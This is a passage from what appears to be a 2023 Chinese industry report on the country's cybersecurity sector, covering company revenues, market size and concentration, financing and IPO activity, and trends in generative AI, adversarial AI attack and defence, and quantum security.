或延后,大量在建项目资金延期到位,导致网安企业应收账 款激增,企业营收和净利润表现不佳,需求侧不振成为网络 安全产业发展增速稳中趋缓的重要原因。 2.大国“零和博弈”加剧, 网络空间竞争交锋烈度和重 点产业供应链风险强度增高 2023 年,大国竞争“零和博弈”趋势更加明显,去全球化 的消极互动成为中短期内全球经济与政治互动的主要特征2, 全球主要国家安全战略将进一步转向大国竞争,叠加地缘政 治冲突、全球能源危机等负面因素,网络空间成为现代战争 和大国对抗的重要战场。2022 年以来,国家间网络攻防、供 应链攻击、虚假信息传播、勒索软件、数据泄露、黑客攻击 等安全事件层出不穷且危害性更强,对国家安全和产业稳定 构成威胁。据波耐蒙研究所和 IBM Security 联合发布的报告 显示,2022 年全球数据泄露规模和平均成本均创下历史新 高,数据泄露事件的平均成本高达 435 万美元;Verizon《2022 年数据泄露调查报告》指出,2022 年针对软件供应商的网络 攻击同比增长 146%,其中 62%的数据泄露归因于供应链安 全漏洞。同时,供应链攻击已成为大国角力中主要的网络攻 击手段,软件业等国际化程度高、供应链条较长的产业将面 临更加严峻的供应链安全风险。网络空间愈发激烈的角逐给 全球安全态势带来更多不确定性严重恶化了我国网络安全 2 中国社科院世界经济与政治研究所《2023 年全球九大趋势展望》 https://baijiahao.baidu.com/s?id=1756735326631939871&wfr=spider&for=pc 形势,对我国加强网络空间安全防护、维护供应链安全稳定 提出了更高要求。 3. 网络攻击技术加快演进升级, 网络安全挑战更加复 杂多样 2023 年,新技术新应用的涌现也为网络安全带来更大挑 战。伴随 AI 大语言模型技术发展, 网络攻击者通过使用 ChatGPT,用较低的成本通过 AI 技术生成攻击代码或垃圾邮 件,从而大大降低网络攻击技术“ 门槛” ;元宇宙相关技术加 快应用可能造成更多窃取和仿冒数字身份事件发生,勒索或 窃取数字账户将成为数字世界网络犯罪和攻击的主要方面; 云原生技术的大量应用可能带来开源代码库漏洞、大量针对 API 接口的网络攻击等网络安全问题;量子计算机能够以更 高速度执行复杂计算,可能被应用于操纵或破坏通信网络、 导航系统甚至武器军事系统,甚至将改变未来战争形态和战 争结果。大量技术的迭代升级带来愈来愈多的网络安全风险 和挑战,需要政府和企业不断更新安全理念,形成合力,筑 牢网络安全防线。 综上所述,2023 年,我国网络安全产业发展面临的形势 依然复杂严峻,既有政策法规细化深入、数字经济赋能、技 术迭代创新等发展机遇,也面临宏观经济下行、大国博弈更 加复杂、网络攻击愈发多元等诸多挑战,网络安全产业将在 暗礁险滩遍布的湍流中探索前行,需要具备更大勇气、更高 智慧、更强动力, 以谋求更光明远大发展前景。 二、我国网络安全产业基本情况 (一)我国网络安全企业总体表现 本报告所指网络安全企业包括三类:一是具备网络安全 专用产品安全检测或安全认证证书,或者计算机信息系统安 全专用产品销售许可证书的企业(即产品型企业);二是具 备中国信息安全测评中心或中国网络安全审查技术与认证 中心服务资质证书的企业(即服务型企业);三是拥有安全 检测或安全认证证书,或者产品销售许可证,且拥有服务资 质证书的企业(综合性企业)。 图 1 2023 年我国网络安全企业的总体构成 1.企业构成及分布 据 CCIA 统计,截至 2023 年上半年,我国共有 3984 家 公司开展网络安全业务,同比增长 22.4%,其中,服务型企 业数量同比增长 32.5%,是网络安全企业数量增长的主要来 源。这主要得益于疫情平稳转段后,企业服务资质申请数量 的增长。 从过去两年来看,国内综合型厂商数量基本恢复到 2021 年的水平,产品型厂商数量近两年持续上升,2023 年对比 2021 年增长 15.6%,但服务型厂商数量对比 2021 年,仍然 下降 25.3%。 2. 网络安全企业收入分析 截至 2023 年 6 月 30 日,我国已公开上市的网络安全企 业共有 26 家。对 26 家上市网络安全企业数据的统计分析显 示(见图 2),2022 年和 2023 年上半年网络安全上市公司 营业收入都保持正增长的公司有 11 家。 图 2 2022Q4-2023H1 我国网络安全上市公司营业收入同比增长率3 2023 年,尽管国内经济逐步复苏,但下游市场需求恢复 3 图 2 涉及数据为 CCIA 和数说安全基于巨潮资讯信息整理。 尚需时日。上半年,26 家安全上市公司营业收入总和约 200 亿元(见表 1),相较于 2022 年同期增长 2.5%。其中,3 家公司收入增速超过 30%,7 家公司收入增速在 20%-30%之 间,7 家公司收入增速在 0-20%之间,9 家公司收入增速为负 值。 表 1 2023 年上半年已公开上市的网络安全企业经营数据 序号 公司 营业收入 (亿元) 营业收入同比增长 * 扣非净利润 (亿元) 扣非净利润同比增长 * 1. 三六零 45.0 -6.6% -2.6 49.5% 2. 深信服 29.3 4.2% -5.9 23.7% 3. 奇安信 24.8 26.2% -9.8 7.1% 4. 启明星辰 15.2 25.3% -0.8 71.4% 5. 电科网安 11.4 -12.7% -0.1 -485.4% 6. 天融信 10.0 14.2% -2.2 6.8% 7. 绿盟科技 7.1 -14.7% -4.3 -93.2% 8. 安恒信息 7.0 30.1% -4.2 -9.7% 9. 亚信安全 5.6 -5.0% -1.9 2.4% 10. 美亚柏科 4.6 -33.8% -2.9 -119.2% 11. 拓尔思 4.4 4.6% 0.5 8.5% 12. 迪普科技 4.4 20.2% 0.3 14.3% 13. 数字认证 3.8 18.4% 0.0 14.3% 14. 山石网科 3.7 -2.9% -1.2 -38.6% 15. 中孚信息 3.3 29.6% -1.9 32.6% 16. 飞天诚信 3.3 -17.3% -0.8 -204.8% 17. 北信源 3.2 38.3% 0.0 99.2% 18. 吉大正元 2.6 22.5% -0.3 -19.6% 19. 浩瀚深度 2.4 28.0% 0.3 12.6% 20. 信安世纪 1.8 4.3% -0.3 -236.4% 21. 任子行 1.8 -29.1% -0.7 -38.1% 22. 格尔软件 1.6 -45.0% -0.8 -24.0% 23. 安博通 1.5 2.2% -0.8 -122.7% 序号 公司 营业收入 (亿元) 营业收入同比增长 % 扣非净利润 (亿元) 扣非净利润同比增长 % 24. 三未信安 1.0 10.1% 0.1 0.6% 25. 永信至诚 0.8 20.3% -0.3 -56.3% 26. 国华网安 0.3 41.1% -0.3 21.1% (二)我国网络安全产业规模及市场集中度分析 1. 我国网络安全产业规模与增速情况 据国内网络安全主要企业调研数据分析显示,2022 年, 我国网络安全市场规模约为 633 亿元,同比增长 3.1%。近三 年行业总体保持增长态势,但受宏观经济等因素影响,网络 安全行业增速持续放缓(见图 3)。 图 3 2022 年中国网络安全市场规模及增速 展望未来三年,网络安全产业发展顶层设计更加完善, 促进行业发展的政策基础愈加稳固,数字经济加速发展等正 向激励将给网络安全产业注入新动力,产业结构调整逐步深 化,更多网络安全板块将涌现出来,预计网络安全产业将保 持 10%以上的增速,到 2025 年市场规模将超过 800 亿元。 2. 我国网络安全产业集中度分析 根据美国经济学家贝恩对产业集中度的划分标准,2022 年, 我国网络安全市场集中度 CRn4具体表现为, CR1 为 9.83%,CR4 为 28.59%,CR8 为 44.91%,网络安全市场集中 度进一步提升(见图 4)。此外,2018-2022 年,领军企业的 市场份额始终保持上升趋势,前四名企业的市场份额已经从 2018 年的 21.71%升至 2022 年的 28.59%。领军企业以先发优 势筑起更高的行业进入门槛,新晋企业需要找到创新和差异 化的方式,在市场中找到自身定位。 图 4 近五年中国网络安全行业集中度分析 4 CR 是 Concentration Ratio 的缩写,中文含义为行业集中度(或行业集中率、市场集中度)。 CRn(如 CR1 、CR4 、CR8 )是指某行业内或相关市场内规模最大的前 n 家企业的收入占市 场份额(营业收入)的总和。CRn 值越小则竞争越激烈,越大则越集中。 从主要企业市场占有率看,奇安信、启明星辰、深信服 和天融信四家企业的市场占有率均超过了 5%(见图 5)。预 计未来数年,领军企业市场占有率仍将保持小幅增长趋势。 图 5 2022 年中国网络安全行业主要企业市占率情况 (三)我国网络安全市场区域分布及增速分析 通过对国内网络安全企业调研数据和网络安全上市公 司的公开数据进行综合分析,得出以下结论: 分区域来看,2022 年,华北、华东和华南等经济发达地 区对网络安全的投入进一步加大, 区域市场占比有所提升 (见图 6)。同时, 网络安全企业积极响应共建“ 一带一路” 倡议,加快探索海外市场。深信服、奇安信和绿盟科技等领 军企业海外业务发展良好,创新型企业积极尝试突破,2022 年取得一定成绩,海外市场占比小幅提升。预计未来海外市 场将成为中国网络安全企业新的业务增长点。 图 6 2022 年中国网络安全市场区域分布 分省市来看,2022 年,大部分省市的网络安全项目量增 速保持正增长(见图 7),但受宏观经济形势影响,各省市 增速分化较为明显,网络安全市场的区域分布呈现不均衡态 势。 图 7 2022 年中国网络安全项目数量省市分布及增速 (四)我国网络安全客户所属行业分布及增速分析 数说安全分析数据显示,2018 年至今,中国网络安全客 户总量超过 15.8 万家,2022 年发生网安项目采购行为的客 户有 67183 家,过去三年持续在网络安全投入的客户超过 2 万家。 从区域分布来看,网络安全客户主要分布在京津冀、长 三角和珠三角地区,川渝地区客户数量增长显著,逐渐成为 新的聚集区(见图 8)。 图 8 中国网络安全客户地图 从行业分布来看,政府部门因政策监管严格,其信息系 统涉及国计民生和国家安全等重要业务,对网络安全项目的 需求较大,依然占据最大份额;教育、医疗卫生、公检法司、 能源化工等与国计民生紧密相关的领域紧随其后,也有较大 占比(见图 9)。 图 9 2022 年中国网络安全项目数量行业分布 (五)我国网络安全客户产品需求热度分析 2022 年,我国网络安全产品需求呈现等保合规类产品为 主流(见图 10),新产品和新应用不断孕育,部分传统安全 产品需求降低的态势。具体来看:首先,网络安全市场需求 受国家相关热点法规政策影响仍然显著,等保合规类产品需 求依旧旺盛,市场占有率较高;但因用户基础网络安全建设 逐渐趋于完备,市场增长率相对较低。其次, 由新技术和新 场景孕育而出的一系列新产品和新应用(见图 10 左上角) 尚处于探索推广阶段,市场规模较小,增速较快。预计未来 受政策要求、安全事件等因素影响,市场需求将持续释放。 再次,负载均衡、数据库防火墙等部分传统安全产品采购热 度降低,增速为负。可以预见,一些功能较为单一的传统安 全产品未来将逐渐作为某些功能特性,被整合进通用型的安 全产品,亦或者被更先进的技术产品所取代。 图 10 2022 年中国网络安全产品采购趋势 (六)我国网络安全市场分类及全景图 受到更加复杂多变的网络安全事件和快速迭代创新的 网络安全技术刺激,传统的单点防御加速向点线面一体化的 综合防御进化,并已形成了一定的市场规模。基于对各细分 市场发展状况、市场成熟度、品牌渗透率、技术发展趋势的 综合研判,形成 2023 年中国网络安全市场分类架构图(见 图 11),涵盖七大基础安全领域(网络与基础架构安全、端 点安全、身份与访问管理、应用安全、数据安全、开发安全、 安全管理)、六大安全解决方案(零信任、数据安全治理、 威胁管理/XDR、攻击面管理、安全运营/MDR/MSS、安全访 问服务边缘)、四大应用场景(云安全、移动安全、物联网 安全、工业互联网安全), 以及九大安全服务(安全方案与 集成、安全运维、风险评估、渗透测试&红蓝对抗、应急响 应、攻防实训/靶场、培训认证、安全意识教育、安全众测), 涉及产品、解决方案、应用场景、服务四个维度,覆盖了目 前我国网络安全行业所有成熟的细分市场。 图 11 中国网络安全市场分类架构示意图 基于网络安全市场分类架构图,报告系统梳理了我国网 络安全企业构成,形成了 2023 年中国网络安全市场全景图 (见图 12)。受外部环境变化、国家政策驱动、应用场景变 迁、资本市场助力、全民安全意识提升等多方面因素影响, 我国网络安全产业进入群雄逐鹿、百花齐放的阶段,国内企 业积极探索、勇于创新,新技术、新产品不断涌现,在一些 技术领域我国网络安全产品和服务水平已接近或达到国际 一流水准。同时,从中短期来看,尽管网络安全产业集中度 不断提高,但中小型企业数量仍然很多,市场碎片化特征依 旧会延续,这有利于产业的进步和发展,但对于网络安全企 业来说,市场竞争将更加激烈,更多企业需要直面淘汰出局 的风险。 图 12 2023 年中国网络安全市场全景图 三、我国网络安全企业竞争力与产业格局 (一)我国网络安全企业竞争力评估 根据公司生命周期理论,网络安全企业的发展可分为初 创期、成长期、成熟期、衰退期四个阶段。鉴于网络安全产 业仍处于增长阶段,本报告重点针对初创期、成长期和成熟 期的网络安全企业进行竞争力评估分析(评估标准和分析方 法见附件二),并评选出代表成熟期企业的“CCIA 50 强” 、 代表成长期企业的 20 家“CCIA 成长之星” 以及代表初创期 企业的 30 家“CCIA 潜力之星”。通过对以上 100 家企业样本 进行分析,得出以下结论: 1. 网络安全成熟期企业竞争力分析 成熟期企业主要覆盖了中等规模以上的网络安全企业, 其安全业务年收入普遍在 1 亿元以上,安全业务毛利达到 1 亿元左右。成熟期企业分布如图 13 所示,右上角领军企业 都已成为上市公司,资源力和竞争力表现均十分突出。领军 企业之间的竞争较为激烈,其发展也呈现分化趋势,未来一 段时间将会延续这种竞争态势。 图 13 CCIA 50 强企业画像 2. 网络安全成长期企业和初创期企业竞争力分析 虽然成长期企业已经具备一定的规模和市场份额,但是 他们和成熟期企业的差距正在扩大。部分成长期企业在经历 了早期快速增长后,业务开始放缓或遭遇瓶颈,需要寻找新 的增长点,否则较难向成熟期企业过渡,当前所处市场地位 也可能受到威胁。 初创期企业在网络安全细分领域具有独特的创新优势, 尽管在技术成熟度和市场营销能力上还有待提高,但其创新 能力和发展潜力受到了投资界的关注。 (二)我国网络安全产业竞争格局 从产业竞争格局的角度来看,我国网络安全企业可以划 分为领导者、战略布局者、成长者和创新者(见图 14)。 图 14 2022 年中国网络安全产业竞争格局 1.领导者:产业领导者均为上市公司,资源力和竞争 力均十分突出,大多处于发展成熟期。领导者之间的竞争较 为激烈,并呈现出“ 强者愈强” 的分化趋势,未来一段时间这 种竞争态势将会延续。 2. 战略布局者:战略布局者多为 IT 龙头企业、大型互 联网企业以及国有企业等,尤其是国有企业正在逐渐成为网 络安全产业的重要参与者。 3.成长者:成长者一般具有一定规模,形成了较为成 熟的商业模式,业务方向相对聚焦,部分企业已上市或接近 上市标准。总体来看,成长者与领导者的资源和竞争力差距 正在扩大,部分成长者收入第二增长曲线放缓,市场地位受 到威胁。 4.创新者:大部分创新者成立时间较短,商业模式尚 不够成熟。尽管在技术成熟度和市场营销能力上还有待提 高,但因其创新属性强和发展势能足等特征备受投资界关 注。 综上所述,网络安全产业领导者与其他企业的差距仍在 扩大; 以大型国有企业和三大电信运营商为代表的战略布局 者持续加大网络安全业务投入,将对产业竞争格局产生重大 影响,带来新的变化;创新者和成长者也将因此面临更大的 挑战,需要规划新的发展战略,寻找新的发展路径和业务增 长点。 四、我国网络安全资本市场分析 (一)我国主要网络安全企业经营情况分析 我国网络安全资本市场分为一级市场和二级市场。报告 选取 2022 年已上市的 26 家网络安全企业中的 20 家作为分 析样本,通过对其经营数据进行分析, 以了解我国网络安全 的总体经营情况,原因如下:一是部分企业为混业经营,上 市主体中包含非安全业务且占比较高,因此未列入本次数据 选取范围(见表 2);二是与一级市场的网络安全企业数据 相对不透明不同,二级市场的企业经营数据定期公开,数据 可获得性高; 三是样本企业在 2022 年的收入占国内网络安 全市场份额超过 60%,在一定程度上可反映网络安全企业总 体经营状况5。 表 2 公开上市的网络安全企业 2022 年经营情况 交易所 板块 证券代码 公司 营业收入 (亿元) 扣非净利润 (亿元) 是否选为样 本企业 上海 科创版 688561.SH 奇安信 62.2 -3.1 是 上海 科创版 688489.SH 三未信安 3.4 1.0 是 上海 科创版 688292.SH 浩瀚深度 4.5 0.5 是 上海 科创版 688244.SH 永信至诚 3.3 0.4 是 上海 科创版 688225.SH 亚信安全 17.2 0.1 是 上海 科创版 688201.SH 信安世纪 6.6 1.6 是 上海 科创版 688168.SH 安博通 4.6 -0.2 是 上海 科创版 688030.SH 山石网科 8.1 -2.1 是 上海 科创版 688023.SH 安恒信息 19.8 -3.0 是 上海 主板 603232.SH 格尔软件 6.6 -0.5 是 上海 科创版 601360.SH 三六零 95.2 -18.6 否 深圳 创业板 300768.SZ 迪普科技 8.9 1.4 是 深圳 创业板 300579.SZ 数字认证 11.0 1.0 是 深圳 创业板 300454.SZ 深信服 74.1 1.0 是 深圳 创业板 300386.SZ 飞天诚信 8.7 -1.2 否 深圳 创业板 300369.SZ 绿盟科技 26.3 0.1 是 深圳 创业板 300352.SZ 北信源 5.4 -1.9 是 深圳 创业板 300311.SZ 任子行 7.3 -0.2 否 深圳 创业板 300229.SZ 拓尔思 9.1 0.8 否 深圳 创业板 300188.SZ 美亚柏科 22.8 0.9 否 深圳 中小板 003029.SZ 吉大正元 4.9 -0.4 是 深圳 中小板 002439.SZ 启明星辰 44.4 5.2 是 深圳 中小板 002268.SZ 电科网安 34.4 2.6 是 深圳 中小板 002212.SZ 天融信 35.4 1.5 是 深圳 中小板 000004.SZ 国华网安 1.7 -5.9 否 深圳 创业板 300659.SZ 中孚信息 6.4 -4.7 是 从营业收入来看,2022 年,样本企业安全业务营业收入 5 网络安全市场和企业收入呈现较为突出的季节性分布特征,下半年收入占全年比例较高,因此,为更加 科学准确地分析企业经营情况,报告选取 2022 年全年企业经营数据进行分析。 合计 387.6 亿元,同比增长 3.1%。其中,安全业务收入超过 10 亿元的有 9 家;超过 20 亿元的有 6 家,分别是深信服、 奇安信、启明星辰、天融信、电科网安和绿盟科技(见图 15)。 图 15 2020-2022 年样本网络安全企业安全业务营业收入 从营收增长情况来看,2022 年,样本企业中,4 家收入 同比增长超过 10% ,5 家收入出现负增长。16 家收入增速为 正,收入增速最高的三家企业为三未信安、信安世纪和电科 网安(见图 16)。 图 16 2022 年样本企业安全业务营业收入及营收增长情况 从盈利能力来看,2022 年,样本企业盈利能力持续下滑, 26 家企业中有 12 家盈利,6 家亏损(见图 17),扣非净利 润不足 1 亿。 图 17 2022 年样本网络安全企业安全业务盈亏状况 2022 年,我国网络安全企业继续加大研发和销售投入, 样本企业研发和销售费用合计达到 203 亿元, 占企业营业收 入的 54.0%。其中,销售费用为 106.7 亿元,同比增长 10.4%, 研发费用达到 96.3 亿元, 同比增长 9.5%。此外,有 8 家企 业的四项费用率(销售费用率+研发费用率+管理费用率+财 务费用率)超过 60%(见图 18),相较于 2021 年的 4 家, 有大幅上升,显示出越来越多的企业盈利空间受到压缩。 图 18 2022 年样本企业费用以及四项费用率构成 从企业现金流量来看,如图 19 所示,2022 年,样本企 业的经营性现金流净额合计为-17.24 亿元,相较与 2021 年同 期的 24.89 亿元,下滑显著。更加需要引起重视的是,2022 年行业整体经营性现金流净额首次出现转负的情形。此外, 投资活动产生的现金流净额合计为-17.78 亿元,筹资活动产 生的现金流净额合计为 44.89 亿元。 图 19 2022 年样本企业现金流净额 综上所述,2022 年,受宏观经济不振和行业竞争加剧等 因素影响,我国网络安全企业经营状况普遍挑战增大,收入 增速放缓,盈利能力和现金造血能力进一步下滑。 (二)我国网络安全产业资本市场表现 我国网络安全上市企业总市值规模从 2018 年底开始急 剧增长,2021 年创历史新高,总市值接近 4000 亿,2022 年 5 月回落至近 2000 亿,2023 年 4 月总市值再次攀升至 3400 亿,较 2022 年最低点上涨约 90%(见图 20)。 图 20 2013-2023 年中国上市网络安全企业市值动态 截至 2023 年 6 月 30 日,国内网络安全上市企业 PS-TTM 中位数6为 6.6,PE-TTM(扣非)中位数7为 19.4(见图 21), 上市企业整体估值有所回升,但仍处于底部。 图 21 2013-2023 年中国上市网络安全企业估值动态 “ 十四五” 期间,网络安全重要性越发凸显,网络安全产 业的发展壮大具有较强的确定性。在成长性确定和低估值的 双因素推动下,网络安全产业有望再次吸引资本的关注和投 入。 (三)我国网络安全企业 IPO 动态 2022 年,亚信安全、三未信安、浩瀚深度和永信至诚成 功登陆科创板;2023 年,盛邦安全成功登陆科创板。同时, 网络安全企业在科创板的 IPO 申报节奏正在回归常态,明朝 万达和渔翁信息 2 家网络安全企业处于申报进程中。 6 PS-TTM 计算公式为:市值/[期末营业总收入+(期初全年营业总收入-期初营业总收入)]。文中的 PS-TTM 中位值指的是过去 10 年网络安全行业的 PS-TTM 中值,代表市场的近 10 年的平均水平。 7 PE-TTM(扣非)计算公式为:市值/[期末归属于母公司普通股股东的扣非净利润+(期初全年归属于母公 司普通股股东的扣非净利润-期初.归属于母公司普通股股东的扣非净利润)]。文中的 PE-TTM(扣非)中位 值指的是过去 10 年网络安全行业的 PE-TTM(扣非)中值,代表市场的近 10 年的平均水平。 表 3 2020-2023 年网络安全企业上市进程情况 序号 企业名称 当前 状态 板块 受理 时间 更新 时间 上市 时间 上市历 经天数 发行市值 (亿元) 最新市值 (亿元) 1 奇安信 上市 科创板 2020/5/11 2020/7/7 2020/7/22 72 381 347 2 信安世纪 上市 科创板 2020/6/29 2021/3/25 2021/4/21 296 25 56 3 亚信安全 上市 科创板 2021/3/12 2022/1/10 2022/2/9 334 122 78 4 浩瀚深度 上市 科创板 2021/6/21 2022/4/29 2022/8/18 423 26 40 5 永信至诚 上市 科创板 2021/6/30 2022/3/1 2022/10/19 476 23 49 6 三未信安 上市 科创板 2021/12/21 2022/6/6 2022/12/2 346 15 63 7 盛邦安全 上市 科创板 2022/6/28 2023/5/17 2023/7/26 393 30 38 8 明朝万达 已问询 科创板 2022/12/30 2023/6/28 n/a n/a n/a n/a 9 渔翁信息 已问询 科创板 2022/12/29 2023/4/26 n/a n/a n/a n/a 10 联软科技 终止 科创板 2021/6/23 2022/1/1 n/a n/a n/a n/a 11 齐治科技 终止 科创板 2020/11/5 2021/3/1 n/a n/a n/a n/a 12 溢信科技 终止 科创板 2020/6/23 2020/10/28 n/a n/a n/a n/a (四)我国网络安全产业投融并情况 2022 年,受宏观环境影响,网络安全一级市场投资热度 下滑较多, 网络安全产业融资事件共有 124 起, 同比下降 32.6%;融资额为 67.8 亿元,同比下降 49.9%(见图 22)。 图 22 2018-2022 年中国网络安全领域融资事件数量金额比较 2022 年,单笔融资额达到亿元以上的融资有 13 起,千 万级的有 47 起,千万级以上融资事件数量占全年融资数量 为 48.4%。与 2021 年相比,千万级以上融资事件占比降幅较 大。 2022 年,投资机构对于网络安全项目的投资变得更加谨 慎,尤其是成长期和中后期项目受影响较大。早期项目获投 数量增长较快。随着注册制改革加速及北交所开市,网络安 全投资退出通道进一步丰富,将对网络安全投资产生正向激 励。 表 4 2022 年-2023 年网络安全企业(一级市场)融资(亿元级)情况 时间 公司简称 轮次 交易金额 投资方 2022/2/24 未来智安 A 轮 亿元级别 君联资本、泰岳梧桐资本 2022/2/25 青藤云 F 轮 未披露 博裕资本、丰厚资本、大湾区共同家园 发展基金 2022/3/22 悬镜 B 轮 数亿元 源码资本、 GGV 纪源资本、红杉中国, 腾讯投资 2022/3/28 微步在线 E+轮 超 3 亿元 鼎晖投资、星路资本 时间 公司简称 轮次 交易金额 投资方 2022/3/29 亿格云 Pre-A 轮 近亿元 红杉中国种子基金 2022/3/30 默安科技 D 轮 3 亿 博裕资本、中金资本 2022/4/14 芯盾时代 D 轮 数亿元 启宸资本、光远资本、临港科创投, 朗玛 峰创投 2022/4/20 华顺信安 C 轮 数亿元 招银国际资本、高榕资本、首建投、招 商局中国基金、红树成长 2022/5/30 天地和兴 D 轮 数亿元 复星创富、国家电投、电科投资、松禾 资本、国科嘉和、苏州国发创投,国网 产业基金、银杏谷资本、中叶资本、南 钢股份、尚颀资本 2022/6/6 威努特 pre-IPO 轮 数亿元 广州工控资本管理有限公司领投、国开 制造、上海国和投资、深投控与农银国 际合作基金跟投 2022/7/18 珞安科技 C 轮 超 5 亿 中金资本、联通、上汽恒旭、国铁建信、 容腾 5G 产业基金 2022/11/1 六方云 C+轮 数亿元 北京创新产业投资有限公司、德厚投资 2022/12/29 长扬科技 F 轮 近 3 亿元 曦域资本、景泰投资 2023/1/15 云天安全 A 轮 1.22 亿元 山东发展投资集团、泰山创投、乐知基 金、高华投资 2023/1/17 烽台科技 B 轮 2.5 亿元 中网投、毅达资本、贵州创新赋能大数 据投资基金、元起资本、中信建设资本、 火山石资本、贵阳创投 2023/2/3 观安信息 E 轮 近 3 亿元 国鑫创投、国家制造业转型基金、卓戴 资本 2023/5/23 领信数科 B 轮 超亿元 晨壹并购基金 2023/6/6 烽台科技 B+轮 1.2 亿元 中化基金、中移北京基金 五、我国网络安全产业发展热点分析 基于对行业领军企业、研究机构, 以及权威的网络安全 领域专家进行问卷调查和深度访谈,结合对国内外网络安全 技术发展趋势的综合研判,从网络安全技术、服务和治理三 个维度,提出 10 项网络安全产业发展热点: (一)生成式人工智能 随着 OpenAI 推出 ChatGPT,生成式人工智能(AIGC) 和大语言模型技术在全球范围内掀起浪潮。生成式人工智能 技术更被 Gartner 公司评为 2022 年十二大战略性技术趋势第 一位8,多个科技巨头重点布局并持续加大投入。其中,谷歌 推出生成式人工智能聊天机器人 Bard 和大型视觉语言模型 PaLM 2,微软更新升级搜索引擎必应(Bing)应用了生成式 预训练大模型 4 技术(GPT-4),META 公司发布人工智能 大型语言模型 LLaMA 等。国内方面,百度“ 文心一言”、阿 里“ 通义千问”、科大讯飞“ 星火认知”、腾讯“ 混元助手”、华 为“ 盘古” 等相继推出,生成式人工智能大规模兴起。 生成式人工智能技术是指具有文本、图片、音频、视频 等内容生成能力的模型及相关技术9。基于大模型高算力训练 基础,生成式人工智能具备自动化内容创作、大规模数据分 析等功能优势,广泛应用于对话聊天、图像生成、自然语言 处理、游戏开发、金融分析等领域,但也带来一定法规风险 和伦理挑战,如数据源违规收集、算法失控、内容真实性可 8 Gartner. Gartner identifies the top strategic technology trends for 2022. https://www.gartner.com/en/newsroom/press-releases/2021-10-18-gartner-identifies-the-top-strategic-technology-tr ends-for-2022. 9 《生成式人工智能服务管理暂行办法》(国家互联网信息办公室 中华人民共和国国家发展和改革委员会 中华人民共和国教育部 中华人民共和国科学技术部 中华人民共和国工业和信息化部 中华人民共和国公 安部 国家广播电视总局令第 15 号) 2023-07 靠性存疑、隐私保护确认、知识产权侵害以及不正当竞争等 问题10。从攻击角度看,大语言模型的代码自动化等功能将 会降低网络攻击门槛,如生成更加逼真的虚假图像或钓鱼邮 件,甚至自动生成恶意软件代码等,此外,针对 AI 算法的 攻击,如数据投毒、对抗样本、成员推断、模型萃取等攻击 方式,为生成式人工智能的广泛应用带来严重威胁,也使得 网络安全监管难度进一步提升。 未来,随着大语言模型技术与多模态技术加速融合,生 成式人工智能将应用于更多场景,特别是在网络安全领域具 备不可估量的发展潜力,如智能化威胁检测和响应、自动化 安全防护和修复、实时威胁情报和预测、自适应安全策略和 防御、人机协同防御等。因此,政府和业界应在鼓励其技术 发展和行业应用的同时,直面风险挑战,建立统筹发展与安 全、符合客观规律和发展阶段的赋能型监管理念。 (二)人工智能对抗攻防技术 近年来随着数据量的爆发式增长、深度学习算法优化改 进、计算能力大幅提升,AI 技术呈现跨越式发展趋势,在计 算机视觉、自然语言处理、自动驾驶等领域取得了突破性进 展。与此同时,AI 安全性和鲁棒性问题引起了业内高度关注, 对抗样本攻击与防御技术是其中受到关注度最高的研究方 向之一, 学术界和产业界提出了多种典型的攻击和防御方 10 马永强.生成式人工智能的风险挑战与监管框架. 中国信息安全,2023-04. 法,两者之间的对抗也在不断进化演绎。 AI 对抗攻防技术是人工智能对抗样本攻击与防御技术 的简称,其中,对抗样本指的是对原始样本添加微小扰动的 样本, 以欺骗 AI 算法,使其产生错误输出结果。因此,AI 对抗样本攻击与防御技术是指围绕人工智能算法和应用,设 计对抗样本进行攻击或开展针对性防御的技术。近年来,AI 对抗攻防技术广泛应用于自动驾驶、医疗卫生、金融应用等 领域。AI 智能系统的非正常运行将直接危害人身安全和财产 安全,AI 对抗攻防技术作为挖掘模型对抗安全风险并进行防 御的关键手段,其发展面临以下难点11:一是深度网络模型 存在技术脆弱性, 由于 AI 技术中广泛使用的深度学习模型 参数规模大、体系结构复杂,预训练需要海量的数据,将导 致攻防技术主要聚焦在单点上,对抗样本的影响难以真正消 除;二是现有防御能力不足,面对不断演进的对抗样本攻击, 主流的防御方式鲁棒性泛化能力弱,防御方法跟进滞后,针 对某种对抗攻击的防御方法通常难以适用于其它攻击方法。 当前,AI 对抗攻防技术正处于由学术研究转化为商业应 用的探索期,大量科技企业、科研院所和高校纷纷入场,在 AI 安全工具、工业互联网、模型鲁棒性基准测试等场景开展 实践探索,并开辟出一些应用场景,例如, 目前已经出现 Cleverhans、Foolbox、ART、Advbox 等支持学术研究的开源 11 北京百度网讯科技有限公司.《AI 对抗攻防技术发展研究报告》 .2022-11 工具,以及利用对抗样本攻击评测计算机视觉模型安全性的 商用平台 RealSafe。阿里巴巴、腾讯、百度等科技企业通过 举办人工智能对抗攻防大赛,积极发现针对人脸识别、图像 分类、文本分析、目标检测等人工智能典型应用的有效对抗 样本攻击和防御方法,并在关乎人身安全、财产安全以及国 家社会安全的重要领域,探索人工智能应用安全防护工作。 在可预见的未来,AI 对抗攻防技术将在人工智能技术生态重 扮演越来越重要的角色,通过提高模型的鲁棒性、增强系统 的安全性以及加强用户隐私保护,AI 对抗攻防技术将使人工 智能系统更加可靠可信。 (三)量子安全技术 量子计算机的崛起可能会破解加密算法,威胁到传统加 密的安全。为应对这一挑战,量子安全技术应运而生,并从 量子计算和量子通信的快速发展中获益匪浅。它是一种基于 量子力学原理的加密解决方案, 旨在抵御未来量子计算机对 传统加密算法的破解威胁。该技术主要包括以下关键内容: 一是量子密钥分发(Quantum Key Distribution,QKD),利 用量子纠缠和不可克隆性原理,实现安全的密钥分发过程。 QKD 确保密钥的安全传输,因为任何对密钥的窃听或干扰都 会破坏量子态,从而被发现。二是量子随机数生成(Quantum Random Number Generation,QRNG), 利用量子物理过程生 成真正的随机数,这些随机数在加密中起到重要作用,用于 生 成 密 钥 、 初 始 化 向 量 等。 三 是 量 子 认 证(Quantum Authentication,QA),利用量子力学特性实现身份验证过程。 通过量子随机数生成和量子态测量,能够确保通信双方的身 份真实性和通信内容的完整性。四是量子安全协议,基于量 子密钥分发和量子认证等机制设计和实施安全协议,用于实 现保密通信、数据完整性验证和身份认证等功能。 量子安全技术的目标是提供一种能够抵御量子计算攻 击的加密解决方案,利用量子力学的不可破坏性和测量干扰 原理,提供了更高级别的加密保护,为未来量子计算机时代 的安全通信打下基础。一方面,基于量子力学原理,量子安 全技术在物理层面上不可破解,为信息理论安全提供保证; 另一方面,量子密钥分发和量子认证等技术可实时检测窃听 和干扰行为,从而确保通信的机密性和完整性;此外,量子 安全技术提供了更高级别的密钥管理机制,包括不可克隆性 